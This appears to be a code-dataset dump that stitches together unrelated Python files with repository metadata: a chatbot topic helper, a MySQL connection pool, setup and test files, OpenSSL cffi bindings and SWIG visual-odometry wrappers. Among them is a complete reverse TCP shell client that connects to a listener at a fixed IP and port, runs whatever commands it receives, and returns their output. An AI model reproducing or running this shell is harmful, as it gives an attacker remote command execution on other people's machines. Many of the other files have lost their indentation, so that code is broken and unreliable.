# Break if we're in too deep.
    if depth > rs._depth:
        rs._warn("Deep recursion while scanning topic inheritance")
        return []
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
    # depth increments by 1 each time this function recursively calls itself.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
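    # For example, with "> topic alpha includes beta inherits gamma": alpha's own triggers
    # and beta's (included) triggers come back prefixed as "{inherits=0}...", while gamma's
    # come back unprefixed, so alpha's and beta's triggers always sort ahead of gamma's
    # when the matching pool is built.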
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| [] |
mattmillr/utaka | src/dataAccess/Connection.py | 6622e9057c323b0aed1113f8723404d264a7c82e | #Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
Connection pool abstraction over the previous Connection.py, which is now SingleConnection.py.
Sets up module-scope connection pools (currently with no size limit): one pool for
connections with dictionary cursors and one for connections with regular cursors.
Pooled connections older than the configured timeout (in hours, from the config file)
are closed and re-created.
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
    def __init__(self, useDictCursor = False):
        # Reuse a pooled connection of the requested cursor type if one is available
        pool = dcp if useDictCursor else rcp
        if len(pool) > 0:
            self.innerConn = pool.pop()
            now = datetime.datetime.today()
            # Recycle connections that have outlived the configured timeout
            if (now - dbTimeout) > self.innerConn.connectTime:
                self.innerConn.close()
                self.innerConn = SingleConnection(useDictCursor)
        else:
            self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
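# A minimal usage sketch (not part of the original module); the table and column names are
# hypothetical and executeStatement simply delegates to the underlying SingleConnection:
#
#   conn = Connection(useDictCursor=True)
#   result = conn.executeStatement("SELECT * FROM users WHERE id = %s", (42,))
#   conn.close()            # commits and returns the connection to the module-level pool
#   # use conn.cancelAndClose() instead to roll back the transaction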
| [((1144, 1169), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1167, 1169), False, 'import datetime\n'), ((1078, 1100), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['(True)'], {}), '(True)\n', (1094, 1100), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1109, 1132), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['(False)'], {}), '(False)\n', (1125, 1132), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1213, 1266), 'utaka.src.Config.get', 'Config.get', (['"""database"""', '"""connection_timeout_in_hours"""'], {}), "('database', 'connection_timeout_in_hours')\n", (1223, 1266), True, 'import utaka.src.Config as Config\n'), ((1452, 1477), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1475, 1477), False, 'import datetime\n'), ((1640, 1671), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['useDictCursor'], {}), '(useDictCursor)\n', (1656, 1671), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1580, 1611), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['useDictCursor'], {}), '(useDictCursor)\n', (1596, 1611), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n')] |
DKorytkin/pylint-pytest | setup.py | 097b7767e5f33ad512d421bea9ebb74a251f47bd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='Reverb Chu',
author_email='[email protected]',
maintainer='Reverb Chu',
maintainer_email='[email protected]',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| [((133, 155), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (145, 155), False, 'from os import path\n'), ((167, 195), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (176, 195), False, 'from os import path\n'), ((696, 739), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests', 'sandbox']"}), "(exclude=['tests', 'sandbox'])\n", (709, 739), False, 'from setuptools import setup, find_packages\n')] |
lismore/OffensiveCyberTools | Shells/Python/Client/TCPReverseShell.py | c43fb78f0067498e53cfa5aad9e0fd60ebd6e069 | # Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
    sock.connect(('192.168.1.95', 5000)) # Replace the IP and port with those of the listener on your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
        if 'terminate' in sentCommand: # if we receive a 'terminate' string from the attack machine, close the socket and end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| [((420, 469), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (433, 469), False, 'import socket\n'), ((1233, 1350), 'subprocess.Popen', 'subprocess.Popen', (['sentCommand'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), '(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, stdin=subprocess.PIPE)\n', (1249, 1350), False, 'import subprocess\n')] |
balabit-deps/balabit-os-6-python-cryptography | src/_cffi_src/openssl/engine.py | c31d184a56a18bad89a6444313367be71b5b0877 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| [] |
AlexandruScrob/fast_api_proj_2 | tests/products/test_products.py | 9aca5d48ab3e42933747b23ff04c6d4f3487d93e | import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "Quaker Oats",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "Quaker Oats"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0]
| [((200, 244), 'httpx.AsyncClient', 'AsyncClient', ([], {'app': 'app', 'base_url': '"""http://test"""'}), "(app=app, base_url='http://test')\n", (211, 244), False, 'from httpx import AsyncClient\n'), ((927, 971), 'httpx.AsyncClient', 'AsyncClient', ([], {'app': 'app', 'base_url': '"""http://test"""'}), "(app=app, base_url='http://test')\n", (938, 971), False, 'from httpx import AsyncClient\n'), ((281, 296), 'tests.shared.info.category_info', 'category_info', ([], {}), '()\n', (294, 296), False, 'from tests.shared.info import category_info, product_info\n'), ((1008, 1023), 'tests.shared.info.category_info', 'category_info', ([], {}), '()\n', (1021, 1023), False, 'from tests.shared.info import category_info, product_info\n'), ((1038, 1064), 'tests.shared.info.product_info', 'product_info', (['category_obj'], {}), '(category_obj)\n', (1050, 1064), False, 'from tests.shared.info import category_info, product_info\n')] |
utiasSTARS/matchable-image-transforms | 3rdparty/pyviso2/src/viso2.py | 2c723872ef82e51dfa32abd3bbcec8410cb7dd2d | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
